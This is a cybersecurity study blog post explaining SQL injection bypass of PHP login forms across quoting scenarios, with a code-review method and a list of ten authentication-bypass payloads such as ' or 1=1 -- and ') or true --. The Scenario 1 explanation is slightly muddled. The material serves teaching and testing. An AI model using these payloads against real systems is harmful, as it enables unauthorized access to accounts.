Premise

In this post, we reviewed a login form written in PHP and vulnerable to SQL Injection. We compared different versions of the code and built a SQL Injection payload for each case.

Skills Learned

  • PHP
  • SQL Injection
  • Code Review

The Root of the Problem: Unsanitized Input

The fundamental issue I look for is how the web application handles the username and password I enter. In the vulnerable examples, the code takes my input and plugs it directly into an SQL query without cleaning or “sanitizing” it first. This is a huge security flaw because it allows me to inject my own SQL commands and manipulate the query to my advantage.

Exploiting Different Login Forms

The way I craft my attack depends entirely on how the backend SQL query is written. Let’s look at a few common scenarios.

Scenario 1: No Quotes

In this case, the SQL query uses the variables for the username and password without any surrounding quotes. This makes the injection pretty straightforward.

  • My Goal: Make the WHERE clause of the query always true.
  • How I do it: I can use a simple payload like ' or 1=1 --. The first part, root', provides a username and closes an imaginary string. The or 1=1 is a condition that is always true, and the -- at the end is a comment in SQL, which tells the database to ignore the rest of the original query (like the part that checks the password).

Scenario 2: Single Quotes

This is a very common setup where the username and password in the query are wrapped in single quotes (e.g., 'username'). My payload needs to account for that initial quote.

  • My Goal: Break out of the single quotes and then make the condition true.
  • How I do it: A payload like ' or 'a'='a works perfectly. The first single quote in my payload closes the opening quote from the original query. Then, I add an OR condition that is always true ('a'='a').

Scenario 3: Parentheses and Quotes

Sometimes, developers wrap their query parameters in both parentheses and quotes, like ('username'). My payload needs to close both.

  • My Goal: Close both the quote and the parenthesis before injecting my logic.
  • How I do it: A payload like ') or true -- does the trick. The ') closes the (' from the query, and or true -- bypasses the rest of the authentication check.

Scenario 4: Double Quotes

This is less common than single quotes, but the principle is identical. If the query uses double quotes (e.g., "username"), I just swap my single quotes for double quotes.

  • My Goal: Break out of the double quotes.
  • How I do it: A payload like " or 1 -- will close the initial double quote and make the condition true.

How I Review Code for Flaws

When I’m looking at the source code (in this case, PHP), my process is simple:

  1. Find the Input: I first locate where the code receives user input, typically from $_POST or $_GET variables for the login and password.
  2. Trace the Input: I then follow that input to see how it’s used. My main question is: Is it being placed directly into an SQL statement?
  3. Craft the Payload: Once I see how the query is constructed (with or without quotes, parentheses, etc.), I can build the perfect SQL injection payload to bypass the login.

This method of analyzing and exploiting vulnerable login forms is a fundamental skill, and understanding it is key to both web security testing and building secure applications.

Technical Commands (SQL Injection Payloads)

Here are the payloads I used to bypass the different login forms:

  • root' or 1=1 --
  • ' or 1=1 --
  • ' or 1 --
  • ' or 'a'='a
  • ') or true --
  • ') or 1 --
  • " or true --
  • " or 1 --
  • ')) or true --
  • ')) or 1 --

Video Walkthrough

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles